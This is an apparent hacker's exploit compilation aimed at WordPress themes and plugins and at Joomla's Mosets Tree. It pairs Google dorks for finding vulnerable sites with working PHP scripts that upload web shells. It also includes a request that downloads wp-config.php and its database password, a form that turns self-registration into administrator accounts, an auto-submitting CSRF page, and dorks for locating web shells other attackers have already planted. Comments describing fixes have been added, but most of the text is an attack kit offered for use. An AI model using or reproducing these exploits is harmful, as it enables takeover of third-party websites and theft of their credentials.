1 | YH=YH=YH=ANON=Yh=Yh=yH | |
2 | #YassineElHilali | |
3 | ||
4 | #1.Exploit Title:WordPress Font Uploader Shell Upload | |
5 | Google Dork : inurl:/wp-content/plugins/font-uploader/ | |
6 | code===> | |
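<?php
// PoC for "WordPress Font Uploader Shell Upload": POSTs a file as the "font"
// multipart field of the plugin's font-upload.php. No session cookie is sent,
// so the PoC assumes the handler is reachable without authentication. The
// double extension (.php.ttf) presumably relies on a server that hands
// *.php.* to the PHP interpreter (Apache AddHandler-style configs) — confirm
// on the target before assuming the stored file will execute.
// Defensive fix for plugin authors: require an authenticated user with an
// upload capability, verify a nonce, and validate extension and MIME type
// server-side against a whitelist of font formats.

$uploadfile = "yourshellname.php.ttf";
$target     = "http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php";

if (!is_readable($uploadfile)) {
    // Fail early instead of sending an empty multipart part.
    fwrite(STDERR, "cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The "@path" upload prefix is disabled by default since PHP 5.6
// (CURLOPT_SAFE_UPLOAD) and removed in PHP 7; use CURLFile when available.
$fontField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'font'   => $fontField,
    'Submit' => 'submit',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing nothing.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>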
22 | ======================================================== | |
#2. Exploit Title: WordPress plugin (Uploadify) Arbitrary File Upload, all versions
Google Dork: inurl:assets/uploadify/ site:.com [adapt the dork to your needs]
==> On a candidate site, locate the uploadify file/folder under assets/ and browse to its uploadify.php.
sample==> http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
27 | code==> | |
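<?php
// PoC for "WordPress plugin Arbitrary File Upload": POSTs a file as the
// "Filedata" field of a bundled Uploadify handler (uploadify.php). "folder"
// names the destination directory the handler writes into (presumably
// relative to the web root — confirm from the response). No session cookie is
// sent, so the handler is assumed to be reachable without authentication.
// The original hard-coded a real third-party hostname as the target; a
// placeholder is used instead. Only run this against systems you are
// authorized to test.
// Defensive fix: delete the stock uploadify.php from the web root if unused;
// otherwise require authentication and validate file type and destination
// server-side.

$uploadfile = "yourshell.php";
$target     = "http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php";

if (!is_readable($uploadfile)) {
    // Fail early instead of sending an empty multipart part.
    fwrite(STDERR, "cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The "@path" upload prefix is disabled by default since PHP 5.6
// (CURLOPT_SAFE_UPLOAD) and removed in PHP 7; use CURLFile when available.
$fileField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $fileField,
    'folder'   => '/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing nothing.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>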
42 | ========================================================== | |
#3. Exploit Title: WordPress Atom Theme Arbitrary File Upload
44 | Google Dork : inurl:"/wp-content/themes/atom/" | |
45 | code==> | |
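<?php
// PoC for "WordPress Atom Theme Arbitrary File Upload": POSTs a file as the
// "Filedata" field of the Uploadify handler shipped inside the Atom theme,
// with "folder" naming the destination directory. No session cookie is sent,
// so the handler is assumed to be reachable without authentication. Per the
// note following this script, the stored file ends up under
// .../atom/uploadify/uploads/ with a random number prefixed to its name.
// Defensive fix: remove the bundled uploadify.php, or require authentication
// and validate file type and destination server-side.

$uploadfile = "yourshell.php";
$target     = "http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php";

if (!is_readable($uploadfile)) {
    // Fail early instead of sending an empty multipart part.
    fwrite(STDERR, "cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The "@path" upload prefix is disabled by default since PHP 5.6
// (CURLOPT_SAFE_UPLOAD) and removed in PHP 7; use CURLFile when available.
$fileField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $fileField,
    'folder'   => '/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing nothing.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>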
60 | ||
Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/<randomnumber><shellname>.php (per the original note, the stored name is a random number followed by your file name — take the exact path from the upload response)
62 | ============================================================= | |
#4. Exploit Title: WordPress theme soulmedic (bundled Revolution Slider) Arbitrary File Download Vulnerability
Google Dork: inurl:"/wp-content/themes/soulmedic/"
http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
===> The request is served by the revslider_show_image admin-ajax action of the Revolution Slider (revslider) plugin, presumably bundled by the theme rather than the theme's own code; the response is the site's wp-config.php, which contains the database name, user and password.
67 | ================================================================ | |
68 | #5.Exploit Title:PHP File Upload Vulnerability | |
69 | Google Dork:inurl:images/jupload.php;guest100;guest100 | |
http://www.yourtarget.com/images/jupload.php;guest100;guest100 [strip the trailing ";guest100;guest100" from the dorked URL]
http://www.yourtarget.com/images/jupload.php [the URL after stripping ";guest100;guest100"]
If the page presents an upload form, upload your file through it.
shell access==> http://www.yourtarget.com/images/shell.php
74 | ================================================================== | |
75 | #6.Exploit Title:Hades+ Framework Add Administrator | |
Google dorks (one per affected theme): inurl:/wp-content/themes/appius/
77 | inurl:/wp-content/themes/Consultant/ | |
78 | inurl:/wp-content/themes/appius1/ | |
79 | inurl:/wp-content/themes/archin/ | |
80 | inurl:/wp-content/themes/averin/ | |
81 | inurl:/wp-content/themes/dagda/ | |
82 | inurl:/wp-content/themes/echea/ | |
83 | inurl:/wp-content/themes/felici/ | |
84 | inurl:/wp-content/themes/kmp/ | |
85 | inurl:/wp-content/themes/kmp2/ | |
86 | inurl:/wp-content/themes/liberal/ | |
87 | inurl:/wp-content/themes/liberal-media-bias/ | |
88 | inurl:/wp-content/themes/linguini/ | |
89 | inurl:/wp-content/themes/livewire/ | |
90 | inurl:/wp-content/themes/majestics/ | |
91 | inurl:/wp-content/themes/mathis/ | |
92 | inurl:/wp-content/themes/mazine/ | |
93 | inurl:/wp-content/themes/Orchestra/ | |
94 | inurl:/wp-content/themes/shopsum/ | |
95 | inurl:/wp-content/themes/shotzz/ | |
96 | inurl:/wp-content/themes/test/ | |
97 | inurl:/wp-content/themes/Viteeo/ | |
98 | inurl:/wp-content/themes/vithy/ | |
99 | inurl:/wp-content/themes/yvora/ | |
100 | inurl:/wp-content/themes/sodales/ | |
101 | Exploit: | |
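<!-- Hades framework option-panel settings write: the theme's
     option_panel/ajax.php with action=save takes name/value pairs, which
     presumably are stored as WordPress options. Setting users_can_register=1
     and default_role=administrator makes every self-registered account an
     administrator; admin_email receives the registration mail. The form is
     submitted from the attacker's own browser with no session, so the
     endpoint is assumed to accept unauthenticated writes.
     Replace [themename] with the vulnerable theme's directory name (appius,
     Consultant, archin, ...) and {%YOUR_EMAIL} with a mailbox you control.
     Defensive fix: require an authenticated user with manage_options and a
     nonce before saving, and whitelist the option names ajax.php may write. -->
<form action="http://www.yourtarget.com/wp-content/themes/[themename]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>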
Process==>
1. In the form above, replace the [themename...] placeholder in the action URL with the vulnerable theme's directory name (appius, Consultant, archin, ...) and {%YOUR_EMAIL} with an email address you control, then submit it.
sample==> http://www.yourtarget.com/wp-content/themes/[vulnerable theme name]/hades_framework/option_panel/ajax.php
115 | 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form]. | |
116 | 3. choose your username & email address and register. | |
117 | 4. go to your email, you will find your password. | |
5. Log in with the new administrator account and upload your shell.
119 | =============================================================== | |
#7. Exploit Title: WordPress Dandelion Theme Arbitrary File Upload
121 | Google Dork: inurl:/wp-content/themes/dandelion/ | |
122 | Code==> | |
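<?php
// PoC for "WordPress Dandelion Theme Arbitrary File Upload": POSTs a file as
// the "Filedata" field of the theme's functions/upload-handler.php. No session
// cookie is sent, so the handler is assumed to be reachable without
// authentication. The original used "yourshell.com" as the target host; the
// page's usual "yourtarget.com" placeholder is used instead.
// Defensive fix: require authentication and a nonce in upload-handler.php and
// validate file type server-side.

$uploadfile = "yourshell.php";
$target     = "http://www.yourtarget.com/wp-content/themes/dandelion/functions/upload-handler.php";

if (!is_readable($uploadfile)) {
    // Fail early instead of sending an empty multipart part.
    fwrite(STDERR, "cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The "@path" upload prefix is disabled by default since PHP 5.6
// (CURLOPT_SAFE_UPLOAD) and removed in PHP 7; use CURLFile when available.
$fileField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $fileField,
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing nothing.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>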
shell link=> http://www.yourtarget.com/uploads/[year]/[month]/your_shell.php (the original note claims a year/month directory layout; verify the exact path from the upload response)
135 | ===================================================================== | |
#8. Exploit Title: WordPress Satoshi Theme Arbitrary File Upload
Google Dork: inurl:/wp-content/themes/satoshi/ (the original dork, inurl:/wp-content/satoshi/dandelion/, does not match the theme path used by the code below)
138 | Code==> | |
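<?php
// PoC for "WordPress Satoshi Theme Arbitrary File Upload": POSTs a file as the
// "Filedata" field of the theme's functions/upload-handler.php — the same
// handler layout as the Dandelion PoC above. No session cookie is sent, so the
// handler is assumed to be reachable without authentication. The original used
// "yourshell.com" as the target host; the page's usual "yourtarget.com"
// placeholder is used instead.
// Defensive fix: require authentication and a nonce in upload-handler.php and
// validate file type server-side.

$uploadfile = "yourshell.php";
$target     = "http://www.yourtarget.com/wp-content/themes/satoshi/functions/upload-handler.php";

if (!is_readable($uploadfile)) {
    // Fail early instead of sending an empty multipart part.
    fwrite(STDERR, "cannot read $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The "@path" upload prefix is disabled by default since PHP 5.6
// (CURLOPT_SAFE_UPLOAD) and removed in PHP 7; use CURLFile when available.
$fileField = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $fileField,
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Surface transport failures instead of silently printing nothing.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>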
150 | ======================================================================== | |
151 | #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF | |
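<?php
/**
 * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
 * 3 October 2010
 * jdc
 *
 * How it works - the admin template form (task=save_templatepage) has no
 * nonce, so a POST made by the victim's browser is accepted with their
 * Joomla administrator session and overwrites one of the m2 template pages
 * with attacker-supplied content ($exploit) — stored PHP in the template.
 * How to exploit - get a logged in admin to click the wrong link ;)
 * Patched in 2.1.7
 *
 * Flow: the outer page embeds a hidden 1x1 iframe of itself with ?iframe=1;
 * the iframe renders the form below and auto-submits it via JavaScript.
 */
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
    'pagecontent' => $exploit,
    'template' => 'm2',
    'option' => 'com_mtree',
    'task' => 'save_templatepage',
    'page' => $page
);
// Relative URL of this script for the self-referencing iframe. The original
// wrote a bare __FILE__ expression here without echo, which printed nothing
// (and a filesystem path would not be a usable URL anyway); the iframe only
// worked because an empty src fell back to a relative "?iframe=1".
$self = htmlspecialchars(basename($_SERVER['SCRIPT_NAME']), ENT_QUOTES) . '?iframe=1';
?>
<html>
<body>
<?php if (!empty($_GET['iframe'])) : ?>
<form id="csrf" action="<?php echo htmlspecialchars($target . $path, ENT_QUOTES); ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v, ENT_QUOTES); ?>"
       name="<?php echo htmlspecialchars($k, ENT_QUOTES); ?>" />
<?php endforeach; ?>
<script type="text/javascript">
// Auto-submit so the victim never has to interact with the hidden form.
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php echo $self; ?>"></iframe>
</div>
<?php endif; ?>
</body>
</html>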
235 | #9.Exploit Title:wordpress potential themes vuln upload | |
236 | 1.dork: inurl:/wp-content/themes/nuance/ | |
237 | exploit: /functions/jwpanel/scripts/valums_uploader/php.php | |
238 | ||
239 | 2. dork: inurl:/wp-content/themes/lightspeed/ | |
240 | exploit: /framework/_scripts/valums_uploader/php.php | |
241 | ||
242 | 3. dork: inurl:/wp-content/themes/saico/ | |
243 | exploit: /framework/_scripts/valums_uploader/php.php | |
244 | ||
245 | 4. dork: inurl:/wp-content/themes/eptonic/ | |
246 | exploit: /functions/jwpanel/scripts/valums_uploader/php.php | |
247 | ||
248 | 5. dork: inurl:/wp-content/themes/skinizer/ | |
249 | exploit: /framework/_scripts/valums_uploader/php.php | |
250 | ||
251 | 6. dork: inurl:/wp-content/themes/area53/ | |
252 | exploit: /framework/_scripts/valums_uploader/php.php | |
253 | ||
254 | 7. dork: inurl:/wp-content/themes/blinc/ | |
255 | exploit:/framework/_scripts/valums_uploader/php.php | |
256 | ||
257 | csrf from html: | |
258 | ||
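<!-- Valums file-uploader handler (php.php) bundled by several themes; swap the
     theme path in the action for the one matching your target (see the list
     of per-theme paths above). "url" appears to be the destination directory
     passed to the handler and "qqfile" is the file field. The form is
     submitted with no session, so the handler is assumed to accept
     unauthenticated uploads.
     Defensive fix: remove the bundled php.php, or require authentication and
     validate file type and destination server-side. -->
<form enctype="multipart/form-data"
action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<!-- The original had type="jpg", which is not a valid input type; browsers
     fall back to a text box, so "text" is the explicit equivalent. -->
<input type="text" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>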
If the handler accepts the upload, your file is stored; if it returns an error, the target is not vulnerable — move on to another one.
266 | shell link==> | |
267 | http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php | |
268 | http://www.yourtarget.com/wp-content/uploads/shell.php | |
269 | #10.Exploit Title:For Noob[Dorking shell] | |
270 | b374k m1n1 | |
271 | Quote: | |
272 | google dork : | |
273 | intitle:b374k m1n1 inurl:wp-content | |
274 | intitle:"index of /" "b374k.php" | |
275 | ||
276 | ||
277 | Dorking shell wso | |
278 | Quote: | |
279 | google dork : | |
280 | intitle:"Index of /uploads" "wso.php" | |
281 | intitle:"index of /" "wso.php" | |
282 | ||
283 | ||
284 | Dorking Shell Madspot | |
This shell has no password by default and gets indexed by Google, so it can be found by dorking.
286 | Quote: | |
287 | google dork : | |
288 | intitle:Madspot Security site:com | |
289 | ||
290 | ||
291 | Dorking Shell 1n73ct10n | |
292 | Quote: | |
293 | google dork : | |
294 | intitle:1n73ct10n inurl:wp-content | |
intitle:"index of /" "1n73ct10n.php"
296 | ########################################################################################### | |
You can find many tutorials on Google for JCE, Revslider, com_user, com_fabrik, WebDAV and JDownloads.
If you are experienced in CMS or back-end web development you can write your own exploits for Joomla, WordPress, Drupal, WooCommerce and so on, but that requires a clear understanding of web applications and how they are built.
A website is a large attack surface (plugins, themes, components, widgets and frameworks: Joomla, WordPress, Drupal, Bootstrap, phpBB, ...); many high-profile vendors reward vulnerabilities that are reported responsibly.